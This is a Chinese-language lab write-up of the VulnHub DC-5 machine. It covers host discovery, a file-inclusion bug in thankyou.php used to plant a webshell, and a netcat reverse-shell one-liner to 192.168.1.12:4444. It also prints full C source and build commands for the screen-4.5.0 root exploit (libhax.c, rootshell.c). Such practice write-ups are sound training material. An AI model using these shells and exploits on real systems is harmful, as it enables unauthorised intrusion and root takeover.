vulnhub DC系列 DC-5

总结:screen-4.5.0提权

目录

下载地址

漏洞利用

信息收集

​编辑

写马

提权


下载地址

使用方法:解压后,使用vm直接打开ova文件。

漏洞利用

信息收集

这里还是使用DC-1的方法

1.给靶机设置一个快照

2.fping -agq 192.168.1.0/24  使用fping快速扫描该网段中存活的机子

3.将靶机关闭重新扫描一下,对比少的那个ip就是靶机的ip

4.使用快照快速将靶机恢复

注:ip段要看自己的

 

我记得rpcbind服务是有一些漏洞,但是这里先尝试看看网页中有什么漏洞。

这里我们看随便生成一个东西,但是没有发现什么东西,接下来我们去扫扫目录文件。

这里扫目录发现一些东西,然后经过尝试,就footer.php有一些奇怪,这里之后就不清楚怎么搞了,然后查看别人的wp,才知道thankyou.php有一个file参数,其中有一个任意文件读取漏洞。

写马

 这里在尝试从日志写马,但是这里修改User-Agent但是并没有马

 这里重新尝试在url位置写马,这个写进去了,接下来我们使用蚁剑连接

提权

因为权限不高,我们这里反弹shell,因为蚁剑的虚拟终端是伪shell还是十分难受的

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.12 4444 >/tmp/f

反弹shell回来,然后使用python,继续搞。

 

 这里先尝试sudo -l,没有任何东西,然后根目录发现什么东西,这里来到用户目录,只有一个dc进去没有什么东西,然后ls -al然后有点东西,但是没有什么用。

接下来我们尝试内核提权,也是没有什么东西,这里在看看suid提权

find / -user root -perm -4000 -exec ls -ldb {} \;
find / -perm /4000 2>/dev/null

 

这里有一个很可疑的命令/bin/screen-4.5.0,这里我们查询一下,这里就直接查询到了一个sceen 4.5.0 exp

这里我们打开他给的sh文件,这里提供了方法,我们先将里面提供的c语言代码,拿出来

这里文件是先在自己的kali搞

注:所有文件我是放到tmp文件夹里面的

libhax.c

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}

 rootshell.c

#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
//编译一下
gcc -fPIC -shared -ldl -o libhax.so libhax.c

//编译rootshell
gcc -o /tmp/rootshell /tmp/rootshell.c

 text.sh

 这里我们通过蚁剑将text.sh,还有编译好的rootshell和libhax.so上传上去

 然后chmod 777 text.sh

./text.sh就提权到了root

 

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

练习两年半的篮球选..哦不对安全选手

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值